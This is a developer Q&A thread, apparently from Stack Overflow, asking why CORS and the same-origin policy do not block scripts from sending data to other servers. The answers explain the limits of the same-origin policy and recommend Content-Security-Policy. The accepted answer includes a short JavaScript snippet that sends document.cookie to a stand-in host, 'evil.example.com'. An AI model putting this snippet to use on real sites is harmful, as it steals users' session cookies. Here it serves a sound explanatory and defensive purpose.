# Why does CORS allow sending data to any server?

Tags: javascript, cross-domain, cors, same-origin-policy

I spend some time to understand how [Cross-Origin-Resource-Sharing](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing) works, and I cannot believe how this could be designed so insecure.

When a website hosted on `foo.com` wants to request a resource which is stored at `bar.com` via ajax, the browser asks `bar.com` if the request is allowed.
Only if `bar.com` explicitly allows asynchronous requests from `foo.com` (via the `Access-Control-Allow-Origin` response header), the resource is delivered to the client.

It´s not a security problem if data should be read. But if data is sent to the requested server, it is.

In the past, if a hacker successfully inserted JavaScript code in a website to steal cookie data or other informations, the [Same-Origin-Policy](http://en.wikipedia.org/wiki/Same-origin_policy) 
prevented that he could send the informations to his own server directly.

But thanks to CORS, a hacker can directly send the stolen information to his own server just by enabling any origin.

I know, CORS is still under development, but already supported by almost all major browsers. So, why is CORS designed like this? Wouldn´t it be much more secure, if the originating server is asked for permission to send ajax requests?

In my oppinion, this is a degradation of security. Or is it not?
All "known issues" I found related to CORS are about weak configuration on the requested server.

Comment: I don't think this is the right resource for this type of question, try http://security.stackexchange.com/

Answer (score 5, accepted):

The same-origin policy is designed purely to prevent one origin from *reading*  resources from another origin. The side effect you describe -- preventing one origin from *sending* data to another origin -- has never been part of the same-origin policy's purpose.

In fact, sending data to another origin has never been prohibited, ever, from the very beginnings of the Web. Your browser sends cross-origin requests all the time: any time it encounters a cross-origin `<img>`, `<script>`, `<iframe>`, etc. The same-origin policy simply restricts scripts' ability to *read* these resources; it has never restricted the browser's ability to fetch them and show them to the user.

Consider the following code:

```
var img = document.createElement("img");
img.src = "http://evil.example.com/steal?cookie=" + document.cookie;
```

This creates:

```
<img src="http://evil.example.com/steal?cookie=SESSION=dfgh6r...">
```

which will send cookie data to `evil.example.com` when it is added to the page's DOM. The same-origin policy has never, ever prevented this kind of behavior.

If you are interested in whitelisting origins that your page is allowed to *send* data to, you want a [content security policy](http://www.html5rocks.com/en/tutorials/security/content-security-policy/), which was designed explicitly as an XSS mitigation mechanism.

Answer (score 2):

CORS wasn't designed for *this* security problem.

For this problem you mention, you need to prevent the site from executing arbitrary javascript. You want, more specifically, to prevent :

- scripts loaded from a non white-listed origin
- scripts directly in the page (as attribute or in a `<script>` element)

For that, we use the `Content-Security-Policy` header which can for example be set to `"script-src 'self'"` (meaning that only scripts loaded from an external file in the same origin can be executed).

Any website with not trivial generated content should have this header set but unfortunately this might be hard to handle in old frameworks as this adds very strong restrictions.

See http://en.wikipedia.org/wiki/Content_Security_Policy

Comment: Note: there are other possible attacks, this answer only covers the one mentioned in the question. But you should also, at least, set the `X-Frame-Options` header and protect from CSRF (usually with a session token).